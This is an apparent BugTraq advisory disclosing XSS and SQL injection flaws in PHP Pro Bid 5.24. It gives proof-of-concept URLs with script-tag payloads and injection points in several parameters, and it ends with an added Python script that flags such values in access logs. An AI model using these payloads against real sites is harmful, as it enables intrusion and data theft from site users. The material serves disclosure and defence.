BugTraq
Phpprobid <= 5.24 XSS SQL injection Vulnerability
Jul 25 2006 05:15PM
securityconnection gmail com
Phpprobid 5.24

http://www.phpprobid.com

--------------------------

Cross Site Scripting (XSS)

--------------------------

http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script>

http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>

-------------

SQL injection

-------------

http://target.xx/viewfeedback.php?view=1'[SQL]

http://target.xx/viewfeedback.php?view=all&start=1'[SQL]

http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]

-----------------

Ellipsis Security

http://www.ellsec.org
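
Added example, not part of the original advisory: a log check that flags requests to the three scripts named above when the listed parameters carry values outside their expected form. The expected-value patterns (digits, or "all" for view; no angle brackets or double quotes in advsrc) are assumptions about legitimate use, not taken from the PHP Pro Bid source, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory. The "expected" patterns are
# assumptions about legitimate values, not taken from the PHP Pro Bid source.
RULES = {
    "auctionsearch.php": {"advsrc": re.compile(r'[^<>"]*')},
    "viewfeedback.php": {"view": re.compile(r"\d+|all"), "start": re.compile(r"\d*")},
    "categories.php": {"orderType": re.compile(r"\d*")},
}
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(script, param, decoded_value)] for values outside the expected form."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    rules = RULES.get(script, {})
    hits = []
    # parse_qsl percent-decodes, so %27 and %3C are seen as ' and <.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        pattern = rules.get(name)
        if pattern and not pattern.fullmatch(value):
            hits.append((script, name, value))
    return hits

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jul/2006:17:20:01 +0000] "GET /viewfeedback.php?view=all&start=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Jul/2006:17:21:44 +0000] "GET /viewfeedback.php?view=1%27 HTTP/1.1" 200 311',
    '203.0.113.9 - - [25/Jul/2006:17:22:10 +0000] "GET /auctionsearch.php?start=1&advsrc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4096',
    '203.0.113.7 - - [25/Jul/2006:17:23:30 +0000] "GET /categories.php?parent=&start=&orderField=itemname&orderType=1 HTTP/1.1" 200 2048',
]

def scan(lines):
    """Collect every suspicious parameter found across the given log lines."""
    return [hit for line in lines for hit in suspicious_params(line)]

if __name__ == "__main__":
    for script, name, value in scan(SAMPLE_LOG):
        print(f"{script}: parameter {name!r} has unexpected value {value!r}")
```

A hit means only that the value departs from the assumed form; it is a triage signal for review, not proof of exploitation.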
